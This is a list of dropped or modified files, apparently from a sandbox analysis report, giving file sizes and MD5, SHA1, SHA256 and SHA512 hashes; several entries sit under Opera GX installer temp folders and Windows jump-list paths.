SHA1e67cf679e83a0ef7aedb8808a3749be691e5f734
SHA256d9c272456cd4b727dc3eb045a16cee0b31723fdc132308ffb6090429e87950bc
SHA512272bd872b364fa55a35d0e7ad7829b7db04b702f8eca1a5e7afe6510b51f9f2a4f13db4d2d25535a08300bc2d0e91c82d38813b9b5a83e969d45252281acae13
-
Filesize
10KB
MD54942d274a176bdeb42944f0b394db5d1
SHA111682add788e97736aaf4610e953c314b3a41db3
SHA256e4298720d6d83f58b2e5a2756d6f54a0fc80d0c814446f0aa8b78fa9090c7806
SHA512e091a68478ecbccf47a518ff063420c989318dba3bc80b892e0dcd43fefd9394ab1dc50c1bf55cc2b2b95b615b17c41b99ad63ffb49b221003f8a5852b902bb2
-
Filesize
10KB
MD5023068b4ab0ebb96786f810db37e4b47
SHA1c89c663ae89bc0d571a896f1dd3b004960a49b98
SHA256d2cebd99a6dc92bdf1c9fe6fbe754d703b1e6216b995d90567faeb368ca1a1d0
SHA51247541062204e1adec1a11c8237a79c8d24221f0ba523d908b1c56be2dab45c6328dbf3e36f93314ba7d3178be01bb7164626c3319717c25d274ac078fac84e54
-
Filesize
11KB
MD5de65e67dafece201254a451edf018638
SHA1d12754aecfb2710e3fcc84985f83bb6671918f19
SHA25607d95465a1a4ff1ce7668a6cfd57fe83cd20f6450361562803235064732f6348
SHA51289d87af74f42405bb72540ab3ae21b838d8c07ac1d8a54e4b92ac5dd5d1791f1fa900dbc7d037dca7fa69f0412f35073136ba1ae7c80c01ce6753631b1c94653
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\additional_file0.tmp
Filesize1.4MB
MD5e9a2209b61f4be34f25069a6e54affea
SHA16368b0a81608c701b06b97aeff194ce88fd0e3c0
SHA256e950f17f4181009eeafa9f5306e8a9dfd26d88ca63b1838f44ff0efc738e7d1f
SHA51259e46277ca79a43ed8b0a25b24eff013e251a75f90587e013b9c12851e5dd7283b6172f7d48583982f6a32069457778ee440025c1c754bf7bb6ce8ae1d2c3fc5
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\assistant_installer.exe
Filesize1.8MB
MD54c8fbed0044da34ad25f781c3d117a66
SHA18dd93340e3d09de993c3bc12db82680a8e69d653
SHA256afe569ce9e4f71c23ba5f6e8fd32be62ac9538e397cde8f2ecbe46faa721242a
SHA512a04e6fd052d2d63a0737c83702c66a9af834f9df8423666508c42b3e1d8384300239c9ddacdc31c1e85140eb1193bcfac209f218750b40342492ffce6e9da481
-
Filesize
6.3MB
MD5eb798e91d503b97614756193e195a7b1
SHA106367f70a0b4c6de9e208c419beb84fa10c0eeef
SHA256406b5edbd94bc38ce345d3c0f34b6b5fcd0405bd290a2ad0fd55c08b0695eed8
SHA5125738431f355f599e88ec8b603f692a23a779ef41183ee1ebad3f7c81a9296a3df626d852cca1256791cc665d912f8f73c4ac00a15e4f96259c253290a40ba020
-
Filesize
5.8MB
MD5d9566efedb5ea286e12826594a40e623
SHA1eba69b688be145e73103ec9587db22e072ee9fb5
SHA256d09af4042577f9c1c72863df791b0114d25086cbf9fa3012b765157ddcbbdf33
SHA512daa4adc5f254088d3b8d22d27b5af3d3663630017903f64377579cba46c0b8e4ffa427b7e51ccdc214e70ed835e2ff9ec2baf4a28a194a1c22dd2ee2abf653bb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize11KB
MD5afb70b6cab0efd1a3227a3fbaeca79e8
SHA14014ec0f1584efb3221e28136f8307dd35bb920d
SHA256467de42ea470c4a2ac60fa4592cec7b7f9a931da4f1c8e6b2529a8d1ff96adc3
SHA51237f8c670ca888a703844f76b34bb1c6553e63091cea38b4700ba6042a3dc969d8b3735110fdd1a43e80d29ecf3e7b6c7456d8924aef9ea2b0355607379915ad7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize10KB
MD5992e35365caf33bcde19086c01dad5a3
SHA1cc2f3e1851263271078c2aca6f9e9d413435029f
SHA2563eba4f8e123b5eb377f0ec66240fd0965208e8292fb96cdea7b2fe4a7aa71850
SHA51230a188372b0d17b6a8cc6227657c53ed3b33432e1f3bd59604a0367b7b465d0a44a7a4204b0e8a04ae0a310409c8f57f16348a61235f470a5afb5de4262002b8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize10KB
MD55c5f6805748dc3a686903ad72ca01cfb
SHA1474a34945369537f0365af474c6d1cc6d4837633
SHA256a9acf9c81ea5e9310b8ac99f8484ed9133c999501130aebd44b2e09737676c31
SHA512cefc84d4f8c20d558f7a29a10e98917a0de71f8c10769e3e07e0328d87ce2c263fd74cf3babeec178c22dc8bd69ebf75987534dc3c896d8c7caedc7e12743215
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize10KB
MD5e0f84e516d133180192674ebbc4332df
SHA1ecb1f690eb8b0513f41a64a8b1a5375c885d6248
SHA256366136133bf42bc80ecc0c7528824600f90dc392d9d8b2e95d2fd67aa50e0bba
SHA512873efbd702541ce4e381a70c5b3d6926f537f41c63c671df151ef5185eeda551c9692c52aa748adf99801cffd8462d373a9126b63eecb73607b2e9e1b1ef79a4
-
Filesize
40B
MD5235b32841f70bc239d5f0ba7b0c29acd
SHA1b4adbd85481504f1907e480713f44c92366e90b2
SHA2564acc251c83b7509af87b5649d73ec72f60427e50f5f39fb975506cba503a5936
SHA51276009292251748e2c4cc6f21cfa9b15f1a7e7d0401baf6a0755fb5362c996138b34d6499da5255fb1cfae8b22d1f0b0f9bc8a2528b0e57b1353e9ab8a56ba8ea
-
Filesize
40B
MD5168fde964b137ba3a40ad87114c95ade
SHA1c658619f987a23aea9b31d0cb777f760d86308a5
SHA256c71080287937bd80ae7076762cb992f7df7a952f329e136488544b99936c4d6a
SHA512e932c0b294feeb33edc97b130a3556fa19c674227999fbfe58299c5104526fd1fd3a4e6adedd845e8241a6e41fdb8cd1beb50853aac6e94319fbb71c00afbf63
-
Filesize
3.1MB
MD57325120c6108c4cc294bb5467780c747
SHA143e1551711952c70c7d06d89ee5419c285376d08
SHA2566fc04831897ac811698c7432dcef4577f08f3418e2e981a2f194bd77b25e61a7
SHA5121c4cd44f5d194b1abc9b4654edddedc13cf3314aa5225a3ec656239d876547fc40fa028a91b92cf76cd98250955032291a04e7da2e34fd11a0a87e9bc8ce6743
-
Filesize
89KB
MD586d68c9cdc087c76e48a453978b63b7c
SHA1b8a684a8f125ceb86739ff6438d283dbafda714a
SHA256df51babc1547a461656eaef01b873a91afcf61851b6f5ef06977e1c33e1b5f32
SHA512dd627f071d994999172048f882ba61407461633634fdb2a3f2b8e6abff6324cc0d78682b5adc4aa4083e5baa1c981687f5c516d9e075eb00dfb58364cee1db04